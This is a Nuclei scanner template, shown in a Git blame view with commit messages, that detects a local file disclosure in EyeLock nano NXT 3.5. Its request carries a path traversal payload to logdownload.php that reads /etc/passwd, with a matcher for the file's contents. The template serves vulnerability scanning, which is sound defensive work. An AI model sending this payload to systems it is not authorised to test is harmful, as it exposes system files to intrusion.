daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/other/eyelock-nano-lfd.yaml

29 lines
855 B
YAML
Raw Normal View History

Create eyelock-nano-lfd.yaml
2021-08-16 10:42:45 +00:00
id: eyelock-nano-lfd
info:
name: EyeLock nano NXT 3.5 - Local File Disclosure
author: geeknik
severity: high
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
description: EyeLock nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This
can be exploited to disclose contents of files from local resources.
reference:
- https://www.zeroscience.mk/codes/eyelock_lfd.txt
Update eyelock-nano-lfd.yaml
2021-08-16 11:10:42 +00:00
tags: iot,lfi,eyelock
Create eyelock-nano-lfd.yaml
2021-08-16 10:42:45 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
Dashboard Content Enhancements (#4111) Dashboard Content Enhancements
2022-04-11 14:42:35 +00:00
# Enhanced by mp on 2022/04/08